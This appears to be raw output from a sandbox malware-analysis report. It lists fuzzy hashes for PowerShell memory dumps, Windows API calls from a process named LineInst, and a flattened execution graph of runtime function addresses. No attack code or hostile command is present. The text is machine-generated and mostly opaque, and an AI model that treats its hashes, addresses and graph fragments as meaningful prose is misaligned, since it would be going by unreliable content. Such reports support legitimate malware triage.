                                                                                                                        • Opcode Fuzzy Hash: 6730bf3e04dc16e60f71d2bc399d6e6b573047e2fd219791f62d8e699c01fecb
                                                                                                                        • Instruction Fuzzy Hash: D041177140EBC44FE7569B39D8559523FF0EF56320B1A06DFD088CB1A3D625B84AC7A2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1851808618.00007FFD9B3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3B0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b3b0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a4005d08aaba3170d5534c008311de6a82cb86e039aad97ae788b39ccc82aedd
                                                                                                                        • Instruction ID: 789b88a9c7473f48a2d277edae08a0a8f154cf1e3183369eb48c8d4d51accdc4
                                                                                                                        • Opcode Fuzzy Hash: a4005d08aaba3170d5534c008311de6a82cb86e039aad97ae788b39ccc82aedd
                                                                                                                        • Instruction Fuzzy Hash: 22213A3090CB4C4FDB58DFAC98467E97BE0EB9A320F04426FD048C3152DA746406CB91
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1851808618.00007FFD9B3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3B0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b3b0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                        • Instruction ID: d6653628ec1ea21fdb969c0c39eb1e29366706e0c56f90460c90c54dbb1c04c5
                                                                                                                        • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                        • Instruction Fuzzy Hash: 8F01A73121CB0C4FD748EF0CE051AB6B7E0FB85320F10056EE58AC36A5DA36E882CB41
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1853195198.00007FFD9B480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B480000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b480000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8cd6a46610ac8d3e5507860b6c07beb4257b4973f8e9a9d117e2b82df571159d
                                                                                                                        • Instruction ID: ca6cb81a2d47bf585c79877eb04cabb9d5c967219e910a6c6c46887fbf2438ed
                                                                                                                        • Opcode Fuzzy Hash: 8cd6a46610ac8d3e5507860b6c07beb4257b4973f8e9a9d117e2b82df571159d
                                                                                                                        • Instruction Fuzzy Hash: 36F03A32B0D9498FE768EA5CA4618A873E0FF4532475500BBE16DC75A7DA25EC41C780
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1853195198.00007FFD9B480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B480000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b480000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dfbe3916a528f8fc5ff35c2d4666c28a9b6b5c6c3d5e3d56650323f9a0b53f68
                                                                                                                        • Instruction ID: d2815fd7709062ca65c1256bf6098cd653c0d1007dbb4f17886c9537feda3058
                                                                                                                        • Opcode Fuzzy Hash: dfbe3916a528f8fc5ff35c2d4666c28a9b6b5c6c3d5e3d56650323f9a0b53f68
                                                                                                                        • Instruction Fuzzy Hash: D2F0A73131CF044FD744EE1DD445661B3E0FBA8314F10452FE449C3655DA21E8818782
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1853195198.00007FFD9B480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B480000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b480000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 49c2780cc577a687500b8111585d0388fb8fa1de998a9dc2a41c149cb58a3cd7
                                                                                                                        • Instruction ID: 236496b55026dd9df14a85d38d8d28887b6c56ab5b6deca99a22efe94d671bbf
                                                                                                                        • Opcode Fuzzy Hash: 49c2780cc577a687500b8111585d0388fb8fa1de998a9dc2a41c149cb58a3cd7
                                                                                                                        • Instruction Fuzzy Hash: DDF03A32A0D9488FE768EA58A4558A877E0EF0632575600BAE16DC74A7DA25AC40C780
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1851808618.00007FFD9B3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3B0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b3b0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1471f29815a81aeb6b47cc9b2eea4685c1c229fa8f01271f4937198478af14d4
                                                                                                                        • Instruction ID: 6b572fb7a89f3a1b0835e2a9e3bd6723ce53316f8625569ec8b336eda880a44e
                                                                                                                        • Opcode Fuzzy Hash: 1471f29815a81aeb6b47cc9b2eea4685c1c229fa8f01271f4937198478af14d4
                                                                                                                        • Instruction Fuzzy Hash: 62F02731508A8C4FC701EF18D8194F67FB0EF16201B0202EBE44DC7072CA219618CBC2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1851808618.00007FFD9B3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3B0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b3b0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: edf1361de78093a29d6fd1a958b104bbea2272506dfb884b00618db05a9c03ff
                                                                                                                        • Instruction ID: 0d1865e05e953ff6b91b769ab95ddd3667647f8061b769a98c248603fa9d7131
                                                                                                                        • Opcode Fuzzy Hash: edf1361de78093a29d6fd1a958b104bbea2272506dfb884b00618db05a9c03ff
                                                                                                                        • Instruction Fuzzy Hash: 07F05E3084D78C9FC706EF6488284B57FB0EF26200B0A42DBE44DCB072D7289918CB92
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1851808618.00007FFD9B3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3B0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b3b0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 08000d23c00a374dda062a1b5f0e232df851c72d8799e53ecd70ba506f950928
                                                                                                                        • Instruction ID: 551ac9f8662eb7efc9055afb44761f4ea2cb8263d003433709bc6f522979ca6c
                                                                                                                        • Opcode Fuzzy Hash: 08000d23c00a374dda062a1b5f0e232df851c72d8799e53ecd70ba506f950928
                                                                                                                        • Instruction Fuzzy Hash: C2F01C3085DBCC9FCB46DF6488299A57FF0FE16210B0A42DBE44DCB172D7299958CB92
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1851808618.00007FFD9B3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3B0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b3b0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: M_^$M_^$M_^$M_^
                                                                                                                        • API String ID: 0-1397233021
                                                                                                                        • Opcode ID: eca77f98c810479cc52d2107122868e3463a86a7d2ce8586c417bd4d6745da68
                                                                                                                        • Instruction ID: 446b588f9e7dca14cdad7e180ca27711cf940df3c7414cec75d18fe1226235b9
                                                                                                                        • Opcode Fuzzy Hash: eca77f98c810479cc52d2107122868e3463a86a7d2ce8586c417bd4d6745da68
                                                                                                                        • Instruction Fuzzy Hash: 9F31C993A1B6D91BF766956E48B54F03FA0EF52B54B0B03FAC4E48A063FE4439074600
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1867715743.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b3d0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 40431d21a4d5ce1428f29ca6942f86b24504461c9bb7072e8ba8db3cc569bb4c
                                                                                                                        • Instruction ID: fd0167c1ddb5419582f7b8cda30795e827256d268a02c51f6f64538d53e7ae52
                                                                                                                        • Opcode Fuzzy Hash: 40431d21a4d5ce1428f29ca6942f86b24504461c9bb7072e8ba8db3cc569bb4c
                                                                                                                        • Instruction Fuzzy Hash: 8F31D87191CB4C9FDB18DF5C984A6A97BE0FB59720F00426FE449C3152DA74A856CBC2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1866204951.00007FFD9B2BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2BD000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b2bd000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 27d2f2c1478af505aa08dbb92b1510ddd6343d1e7f92acb28ab337dffff2f58f
                                                                                                                        • Instruction ID: 4753ecad15f2d1248fdc53dcadc6176538a54f67e0fe5655de4fba6a0abd5f7b
                                                                                                                        • Opcode Fuzzy Hash: 27d2f2c1478af505aa08dbb92b1510ddd6343d1e7f92acb28ab337dffff2f58f
                                                                                                                        • Instruction Fuzzy Hash: BA41067180EBC44FD7569B3998559523FF0EF57320B1A05DFD088CB1A3DA29A846CBA2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1867715743.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b3d0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6d964fa52e1a56265e74a1c9f511f06c1cb6d48e96127b8c841407f6366524d3
                                                                                                                        • Instruction ID: bfa7ab4cd07fc462da502719279a21b6e84338ee583a16e826ce2fd0139f63dc
                                                                                                                        • Opcode Fuzzy Hash: 6d964fa52e1a56265e74a1c9f511f06c1cb6d48e96127b8c841407f6366524d3
                                                                                                                        • Instruction Fuzzy Hash: 4A21293190CA4C8FDB58DF9CD84A7E97BE0EB96321F04426FD049C3162DA74A40ACB91
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1867715743.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b3d0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                        • Instruction ID: bfb36fa0363ad731f6b5ca7a7d85b04961e9e267f58d672a1290080f67e65a44
                                                                                                                        • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                        • Instruction Fuzzy Hash: 1601677121CB0C4FD748EF4CE451AA5B7E0FB95364F10056DE58AC36A5DA36E882CB45
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1867715743.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b3d0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e13e81c938c996cceef375918b991f48441e28af0755b273c9252bb54cf8e529
                                                                                                                        • Instruction ID: ef97a1562a1f746ff41b2df3d6574c6d56b2f10c71e6201c0596d25acf8f509f
                                                                                                                        • Opcode Fuzzy Hash: e13e81c938c996cceef375918b991f48441e28af0755b273c9252bb54cf8e529
                                                                                                                        • Instruction Fuzzy Hash: E6F02B3081968D4FDB0ADF6888154D57FA0FF16350B05039BD458C71B2DB659558CB82
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1868745495.00007FFD9B4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b4a0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 28da6178d5785a81dbc4528360ea8943c8e1f120f1496e11a197b8c17df2eae8
                                                                                                                        • Instruction ID: 0e3c4ac494a8c2fc12e373d65dcd38df93497e9b38ba1b9c848ed912729e14bb
                                                                                                                        • Opcode Fuzzy Hash: 28da6178d5785a81dbc4528360ea8943c8e1f120f1496e11a197b8c17df2eae8
                                                                                                                        • Instruction Fuzzy Hash: FBF05E32B0D5498FE768EA5CE4618A873E0FF4532475500BBE16DC75A7DB25EC41C780
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1867715743.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b3d0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0926ec818198f7ce522f4267e26b00767242ce8dc72a31be43a9c95f5f5f2396
                                                                                                                        • Instruction ID: ed11fbd3c797c56d87c64a946c86a3af2c92f193ee8fb934fcf0602330b6adb3
                                                                                                                        • Opcode Fuzzy Hash: 0926ec818198f7ce522f4267e26b00767242ce8dc72a31be43a9c95f5f5f2396
                                                                                                                        • Instruction Fuzzy Hash: C5F0273151868C4FC701EF18D8154E67FB0FF96204B0103EBE44DC7072C6219618CBC2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1868745495.00007FFD9B4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b4a0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0469b9c680061f40ec15f9ba32313a185b04c4df7bc0ed43c46ac3ce4b164a28
                                                                                                                        • Instruction ID: d2815fd7709062ca65c1256bf6098cd653c0d1007dbb4f17886c9537feda3058
                                                                                                                        • Opcode Fuzzy Hash: 0469b9c680061f40ec15f9ba32313a185b04c4df7bc0ed43c46ac3ce4b164a28
                                                                                                                        • Instruction Fuzzy Hash: D2F0A73131CF044FD744EE1DD445661B3E0FBA8314F10452FE449C3655DA21E8818782
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1868745495.00007FFD9B4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b4a0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0524a9c279c333a1b88a4b58aee1a00eb995107ce2b272084e930bb15396cdc8
                                                                                                                        • Instruction ID: dd840c5cc1f58d6768b18e16e31380f7b54b7bf7fafca84b0cc5af86395c2529
                                                                                                                        • Opcode Fuzzy Hash: 0524a9c279c333a1b88a4b58aee1a00eb995107ce2b272084e930bb15396cdc8
                                                                                                                        • Instruction Fuzzy Hash: A2F03A32A0D5888FD768EA58A4558A877E0EF0632575600BAE16DC74A7DA25AC41C780
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1867715743.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b3d0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a864a51a561283f533caca4cc3ff30b2ed758f402a4d451dec573ff28ce4306f
                                                                                                                        • Instruction ID: ab43c03a56dcdfc1b09cdfdf5d85092c7d8d8fc8b911a2e3fb8c3c6bc425488f
                                                                                                                        • Opcode Fuzzy Hash: a864a51a561283f533caca4cc3ff30b2ed758f402a4d451dec573ff28ce4306f
                                                                                                                        • Instruction Fuzzy Hash: 10F05E3081D78C8FC706EF6498284B57FB0EF66201B0A42DBE44DCB072D7259918CB92
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1867715743.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b3d0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8ddbbaefc88bb0a27d7887b53002af7ced5df8a8186c081e2bce316027c5ed49
                                                                                                                        • Instruction ID: d94f9f89ee2f138ecaa7b90b254456eb7e81f3babed41a597eb3198238c75a43
                                                                                                                        • Opcode Fuzzy Hash: 8ddbbaefc88bb0a27d7887b53002af7ced5df8a8186c081e2bce316027c5ed49
                                                                                                                        • Instruction Fuzzy Hash: 55F01C3081D7CC8FCB46DF6498298A57FF0FE56210B0A42DBE48DCB172D7299958CB92
                                                                                                                        APIs
                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00AE3182
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00AE3191
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00AE319A
                                                                                                                        • GetTickCount.KERNEL32 ref: 00AE31A3
                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00AE31B8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.2919708205.0000000000A71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A70000, based on PE: true
• Associated: 0000000B.00000002.2919558326.0000000000A70000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2920266011.0000000000AE9000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2920499400.0000000000AED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2920499400.0000000000AF1000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2920499400.0000000000B00000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2920499400.0000000000B2D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2920499400.0000000000B43000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2920499400.0000000000B45000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2920499400.0000000000B4E000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2920499400.0000000000B70000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2920499400.0000000000B7A000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2920499400.0000000000B85000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_a70000_LineInst.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1445889803-0
                                                                                                                        • Opcode ID: c4cc6dc8a3bb29d4b40ca6391afe81b27ec94ece67f44b917cc22860ea2a8d35
                                                                                                                        • Instruction ID: 83b784b7442b16ffff36296c51c81d97182c1802dbe45378f522da10807a27a2
                                                                                                                        • Opcode Fuzzy Hash: c4cc6dc8a3bb29d4b40ca6391afe81b27ec94ece67f44b917cc22860ea2a8d35
                                                                                                                        • Instruction Fuzzy Hash: B911DA71D012489FCF10DBF9EA8869EB7F6EF48315F554A59D402EB210E6309B018B40

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:10%
                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                        Signature Coverage:0%
                                                                                                                        Total number of Nodes:2000
                                                                                                                        Total number of Limit Nodes:30
                                                                                                                        execution_graph 19093 7ff7c5bf9664 19096 7ff7c5be42f8 LeaveCriticalSection 19093->19096 17696 7ff7c5bf94de 17699 7ff7c5bf94ee 17696->17699 17700 7ff7c5be42f8 LeaveCriticalSection 17699->17700 17638 7ff7c5bee8dc 17639 7ff7c5beeace 17638->17639 17641 7ff7c5bee91e _isindst 17638->17641 17640 7ff7c5be4444 _wfindfirst32i64 11 API calls 17639->17640 17658 7ff7c5beeabe 17640->17658 17641->17639 17644 7ff7c5bee99e _isindst 17641->17644 17642 7ff7c5bdad80 _wfindfirst32i64 8 API calls 17643 7ff7c5beeae9 17642->17643 17659 7ff7c5bf53b4 17644->17659 17649 7ff7c5beeafa 17650 7ff7c5be9dd0 _wfindfirst32i64 17 API calls 17649->17650 17652 7ff7c5beeb0e 17650->17652 17656 7ff7c5bee9fb 17656->17658 17683 7ff7c5bf53f8 17656->17683 17658->17642 17660 7ff7c5bf53c3 17659->17660 17664 7ff7c5bee9bc 17659->17664 17690 7ff7c5bef788 EnterCriticalSection 17660->17690 17665 7ff7c5bf47b8 17664->17665 17666 7ff7c5bf47c1 17665->17666 17670 7ff7c5bee9d1 17665->17670 17667 7ff7c5be4444 _wfindfirst32i64 11 API calls 17666->17667 17668 7ff7c5bf47c6 17667->17668 17669 7ff7c5be9db0 _invalid_parameter_noinfo 37 API calls 17668->17669 17669->17670 17670->17649 17671 7ff7c5bf47e8 17670->17671 17672 7ff7c5bf47f1 17671->17672 17673 7ff7c5bee9e2 17671->17673 17674 7ff7c5be4444 _wfindfirst32i64 11 API calls 17672->17674 17673->17649 17677 7ff7c5bf4818 17673->17677 17675 7ff7c5bf47f6 17674->17675 17676 7ff7c5be9db0 _invalid_parameter_noinfo 37 API calls 17675->17676 17676->17673 17678 7ff7c5bf4821 17677->17678 17679 7ff7c5bee9f3 17677->17679 17680 7ff7c5be4444 _wfindfirst32i64 11 API calls 17678->17680 17679->17649 17679->17656 17681 7ff7c5bf4826 17680->17681 17682 7ff7c5be9db0 _invalid_parameter_noinfo 37 API calls 17681->17682 17682->17679 17691 7ff7c5bef788 EnterCriticalSection 17683->17691 14685 7ff7c5bda370 14686 7ff7c5bda39e 14685->14686 14687 7ff7c5bda385 14685->14687 14687->14686 14690 
7ff7c5becacc 14687->14690 14691 7ff7c5becb17 14690->14691 14695 7ff7c5becadb _wfindfirst32i64 14690->14695 14700 7ff7c5be4444 14691->14700 14693 7ff7c5becafe HeapAlloc 14694 7ff7c5bda3fc 14693->14694 14693->14695 14695->14691 14695->14693 14697 7ff7c5bf26b0 14695->14697 14703 7ff7c5bf26f0 14697->14703 14709 7ff7c5bea798 GetLastError 14700->14709 14702 7ff7c5be444d 14702->14694 14708 7ff7c5bef788 EnterCriticalSection 14703->14708 14710 7ff7c5bea7d9 FlsSetValue 14709->14710 14714 7ff7c5bea7bc 14709->14714 14711 7ff7c5bea7eb 14710->14711 14724 7ff7c5bea7c9 SetLastError 14710->14724 14726 7ff7c5bedd40 14711->14726 14714->14710 14714->14724 14716 7ff7c5bea818 FlsSetValue 14719 7ff7c5bea836 14716->14719 14720 7ff7c5bea824 FlsSetValue 14716->14720 14717 7ff7c5bea808 FlsSetValue 14718 7ff7c5bea811 14717->14718 14733 7ff7c5be9e18 14718->14733 14739 7ff7c5bea3c4 14719->14739 14720->14718 14724->14702 14731 7ff7c5bedd51 _wfindfirst32i64 14726->14731 14727 7ff7c5bedda2 14730 7ff7c5be4444 _wfindfirst32i64 10 API calls 14727->14730 14728 7ff7c5bedd86 HeapAlloc 14729 7ff7c5bea7fa 14728->14729 14728->14731 14729->14716 14729->14717 14730->14729 14731->14727 14731->14728 14732 7ff7c5bf26b0 _wfindfirst32i64 2 API calls 14731->14732 14732->14731 14734 7ff7c5be9e4c 14733->14734 14735 7ff7c5be9e1d RtlFreeHeap 14733->14735 14734->14724 14735->14734 14736 7ff7c5be9e38 GetLastError 14735->14736 14737 7ff7c5be9e45 __free_lconv_mon 14736->14737 14738 7ff7c5be4444 _wfindfirst32i64 9 API calls 14737->14738 14738->14734 14744 7ff7c5bea29c 14739->14744 14756 7ff7c5bef788 EnterCriticalSection 14744->14756 17705 7ff7c5bf07f0 17716 7ff7c5bf6764 17705->17716 17717 7ff7c5bf6771 17716->17717 17718 7ff7c5be9e18 __free_lconv_mon 11 API calls 17717->17718 17719 7ff7c5bf678d 17717->17719 17718->17717 17720 7ff7c5be9e18 __free_lconv_mon 11 API calls 17719->17720 17721 7ff7c5bf07f9 17719->17721 17720->17719 17722 7ff7c5bef788 EnterCriticalSection 17721->17722 17723 7ff7c5beb9f0 17734 7ff7c5bef788 
EnterCriticalSection 17723->17734 17784 7ff7c5bf96f9 17785 7ff7c5bf9712 17784->17785 17786 7ff7c5bf9708 17784->17786 17788 7ff7c5bef7e8 LeaveCriticalSection 17786->17788 19204 7ff7c5be4290 19205 7ff7c5be429b 19204->19205 19213 7ff7c5bee354 19205->19213 19226 7ff7c5bef788 EnterCriticalSection 19213->19226 17875 7ff7c5befa08 17876 7ff7c5befa2c 17875->17876 17878 7ff7c5befa3c 17875->17878 17877 7ff7c5be4444 _wfindfirst32i64 11 API calls 17876->17877 17879 7ff7c5befa31 17877->17879 17880 7ff7c5befd1c 17878->17880 17881 7ff7c5befa5e 17878->17881 17882 7ff7c5be4444 _wfindfirst32i64 11 API calls 17880->17882 17883 7ff7c5befa7f 17881->17883 18006 7ff7c5bf00c4 17881->18006 17884 7ff7c5befd21 17882->17884 17887 7ff7c5befaf1 17883->17887 17888 7ff7c5befaa5 17883->17888 17893 7ff7c5befae5 17883->17893 17886 7ff7c5be9e18 __free_lconv_mon 11 API calls 17884->17886 17886->17879 17890 7ff7c5bedd40 _wfindfirst32i64 11 API calls 17887->17890 17904 7ff7c5befab4 17887->17904 18021 7ff7c5be8518 17888->18021 17889 7ff7c5befb9e 17900 7ff7c5befbbb 17889->17900 17905 7ff7c5befc0d 17889->17905 17894 7ff7c5befb07 17890->17894 17893->17889 17893->17904 18027 7ff7c5bf64ac 17893->18027 17897 7ff7c5be9e18 __free_lconv_mon 11 API calls 17894->17897 17896 7ff7c5be9e18 __free_lconv_mon 11 API calls 17896->17879 17901 7ff7c5befb15 17897->17901 17898 7ff7c5befaaf 17902 7ff7c5be4444 _wfindfirst32i64 11 API calls 17898->17902 17899 7ff7c5befacd 17899->17893 17907 7ff7c5bf00c4 45 API calls 17899->17907 17903 7ff7c5be9e18 __free_lconv_mon 11 API calls 17900->17903 17901->17893 17901->17904 17909 7ff7c5bedd40 _wfindfirst32i64 11 API calls 17901->17909 17902->17904 17906 7ff7c5befbc4 17903->17906 17904->17896 17905->17904 17908 7ff7c5bf24fc 40 API calls 17905->17908 17915 7ff7c5befbc9 17906->17915 18063 7ff7c5bf24fc 17906->18063 17907->17893 17910 7ff7c5befc4a 17908->17910 17911 7ff7c5befb37 17909->17911 17912 7ff7c5be9e18 __free_lconv_mon 11 API calls 17910->17912 17917 7ff7c5be9e18 __free_lconv_mon 11 
[Execution graph residue: the interactive call-graph widget of the report was flattened into node/edge text (numeric node ids, function addresses in the 0x7ff7c5bd1000–0x7ff7c5bf8388 range, and "A->B" edges) and is not reproduced here. The recoverable information is the set of routine names attached to the graph nodes.]

